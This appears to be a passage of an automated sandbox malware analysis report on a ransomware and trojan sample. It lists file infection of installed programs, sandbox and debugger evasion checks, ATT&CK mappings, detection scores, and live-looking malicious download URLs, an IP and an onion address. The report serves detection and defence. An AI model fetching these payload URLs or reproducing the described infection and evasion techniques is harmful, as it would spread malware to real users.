                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Microsoft Office\Office16\msoia.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\104.0.5112.81\chrome_installer.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Au3Info_x64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\Wordconv.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft analysis services\AS OLEDB\110\SQLDumper.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\VPREVIEW.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\reader_sl.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\upx.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateSetup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msotd.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\orbd.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeFile created: C:\Users\user\AppData\Local\Temp\vSQshX.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 799
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C21718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00C21754h
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F396A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F396C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpi,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpi,FindNextFileA,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C22B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeSystem information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: Amcache.hve.1.drBinary or memory string: VMware
                    Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                    Source: Amcache.hve.1.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.1.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
                    Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.1.drBinary or memory string: VMware7,1
                    Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.me
                    Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                    Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F395210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3A6044 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F395EC0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F393AA0 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,
                    Source: SciTE.exe.1.drBinary or memory string: GShift+Alt+KeypadPlusMinusDecimalDivideMultiplyLeftRightUpDownInsertEndEnterSpaceEscapeWinMenuPLAT_WINPLAT_WINNTPropertiesEmbeddedtoolbar.largeACCELSSciTESciTEWindowSciTEWindowContentlatin1latin2big5gbkshift_jiseuc-krcyrilliciso-8859-5iso8859-111250windows-1251translation.encodingSciTE_HOMESciTE_USERHOMEUSERPROFILEHHCTRL.OCXHtmlHelpWRich Text FormatShell_TrayWndButtonfull.screen.hides.menuEditcmd.exe /c
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3990A0 cpuid
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C21718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C2139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F397330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,
                    Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts12
                    Native API                    		Path Interception1
                    Access Token Manipulation                    		2
                    Obfuscated Files or Information                    		21
                    Input Capture                    		11
                    System Time Discovery                    		1
                    Taint Shared Content                    		11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium2
                    Ingress Tool Transfer                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                    Data Encrypted for Impact
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts2
                    Process Injection                    		3
                    Software Packing                    		LSASS Memory1
                    Account Discovery                    		Remote Desktop Protocol21
                    Input Capture                    		Exfiltration Over Bluetooth2
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                    Masquerading                    		Security Account Manager1
                    System Network Connections Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
                    Non-Standard Port                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                    Virtualization/Sandbox Evasion                    		NTDS3
                    File and Directory Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer2
                    Non-Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Access Token Manipulation                    		LSA Secrets46
                    System Information Discovery                    		SSHKeyloggingData Transfer Size Limits12
                    Application Layer Protocol                    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common2
                    Process Injection                    		Cached Domain Credentials131
                    Security Software Discovery                    		VNCGUI Input CaptureExfiltration Over C2 Channel1
                    Proxy                    		Jamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                    Process Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                    Remote System Discovery                    		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SY5DeZW6pz.exe81%VirustotalBrowse
                    SY5DeZW6pz.exe66%MetadefenderBrowse
                    SY5DeZW6pz.exe95%ReversingLabsWin32.Ransomware.GandCrab
                    SY5DeZW6pz.exe100%AviraW32/Jadtre.B
                    SY5DeZW6pz.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
                    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
                    C:\Users\user\AppData\Local\Temp\vSQshX.exe100%AviraTR/Dldr.Small.Z.haljq
                    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\vSQshX.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\vSQshX.exe76%MetadefenderBrowse
                    C:\Users\user\AppData\Local\Temp\vSQshX.exe100%ReversingLabsWin32.Trojan.Skeeyah

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    1.0.vSQshX.exe.c20000.3.unpack100%AviraW32/Jadtre.DDownload File
                    0.2.SY5DeZW6pz.exe.3760000.0.unpack100%AviraW32/Jadtre.BDownload File
                    0.2.SY5DeZW6pz.exe.f390000.1.unpack100%AviraW32/Jadtre.BDownload File
                    1.0.vSQshX.exe.c20000.0.unpack100%AviraW32/Jadtre.DDownload File
                    1.2.vSQshX.exe.c20000.0.unpack100%AviraW32/Jadtre.DDownload File
                    0.0.SY5DeZW6pz.exe.3760000.2.unpack100%AviraW32/Jadtre.BDownload File
                    1.0.vSQshX.exe.c20000.1.unpack100%AviraW32/Jadtre.DDownload File
                    0.0.SY5DeZW6pz.exe.f390000.3.unpack100%AviraW32/Jadtre.BDownload File
                    0.0.SY5DeZW6pz.exe.f390000.1.unpack100%AviraW32/Jadtre.BDownload File
                    0.0.SY5DeZW6pz.exe.f390000.0.unpack100%AviraW32/Jadtre.BDownload File

                    Domains

                    SourceDetectionScannerLabelLink
                    ddos.dnsnb8.net6%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://ddos.dnsnb8.net:799/cj//k3.rar%100%Avira URL Cloudmalware
                    http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b0%URL Reputationsafe
                    http://www.develop.comYann0%URL Reputationsafe
                    http://ddos.dnsnb8.net:799/cj//k3.rar7%VirustotalBrowse
                    http://ddos.dnsnb8.net:799/cj//k3.rar100%Avira URL Cloudmalware
                    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
                    http://www.baanboard.comPraveen0%URL Reputationsafe
                    http://ddos.dnsnb8.net:799/cj//k2.rar%100%Avira URL Cloudmalware
                    http://ddos.dnsnb8.net:799/cj//k2.rar100%Avira URL Cloudmalware
                    http://www.activestate.comJames0%URL Reputationsafe
                    http://ddos.dnsnb8.net/&100%Avira URL Cloudmalware
                    http://www.develop.com0%URL Reputationsafe
                    http://www.spaceblue.comDenis0%URL Reputationsafe
                    http://ddos.dnsnb8.net:799/cj//k1.rar0%URL Reputationsafe
                    http://www.spaceblue.com0%URL Reputationsafe
                    http://www.rftp.comSteve0%URL Reputationsafe
                    http://www.baanboard.com0%URL Reputationsafe
                    http://www.scintila.org/scite.rng0%URL Reputationsafe
                    https://tox.chat/download.html0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ddos.dnsnb8.net
                    		63.251.106.25
                    		truetrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://ddos.dnsnb8.net:799/cj//k2.rartrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://ddos.dnsnb8.net:799/cj//k1.rartrue
                    • URL Reputation: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://ddos.dnsnb8.net:799/cj//k3.rar%vSQshX.exe, 00000001.00000002.359919761.000000000142E000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2bSY5DeZW6pz.exetrue
                    • URL Reputation: safe
                    		unknown
                    http://www.activestate.comSciTE.exe.1.drfalse
                      		high
                      http://www.develop.comYannSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://ddos.dnsnb8.net:799/cj//k3.rarvSQshX.exe, 00000001.00000002.360215641.00000000030C9000.00000004.00000010.00020000.00000000.sdmptrue
                      • 7%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEvSQshX.exe, 00000001.00000003.310095902.00000000014B0000.00000004.00001000.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.331514201.0000000000C23000.00000002.00000001.01000000.00000004.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://www.baanboard.comPraveenSciTE.exe.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://upx.sf.netAmcache.hve.1.drfalse
                        		high
                        http://www.rftp.comSciTE.exe.1.drfalse
                          		high
                          https://www.torproject.org/SY5DeZW6pz.exefalse
                            		high
                            http://ddos.dnsnb8.net:799/cj//k2.rar%vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.scintilla.orgSciTE.exe.1.drfalse
                              		high
                              http://www.activestate.comJamesSciTE.exe.1.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://ddos.dnsnb8.net/&vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.develop.comSciTE.exe.1.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.lua.orgSciTE.exe.1.drfalse
                                		high
                                http://www.spaceblue.comDenisSciTE.exe.1.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.spaceblue.comSciTE.exe.1.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.rftp.comSteveSciTE.exe.1.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.baanboard.comSciTE.exe.1.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.scintila.org/scite.rngSciTE.exe.1.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.autoitscript.com/autoit3/sciteSciTE.exe.1.drfalse
                                  		high
                                  https://tox.chat/download.htmlSY5DeZW6pz.exefalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  63.251.106.25
                                  		ddos.dnsnb8.netUnited States
                                  		29791VOXEL-DOT-NETUStrue

                                  Private

                                  IP
                                  192.168.2.1

                                  General Information

                                  Joe Sandbox Version:35.0.0 Citrine
                                  Analysis ID:694552
                                  Start date and time:2022-08-31 23:40:23 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 8m 21s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:SY5DeZW6pz.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.rans.spre.troj.evad.winEXE@7/17@1/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 93.8% (good quality ratio 88.6%)
                                  • Quality average: 80.1%
                                  • Quality standard deviation: 26.7%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Adjust boot time
                                  • Enable AMSI

                                  Warnings

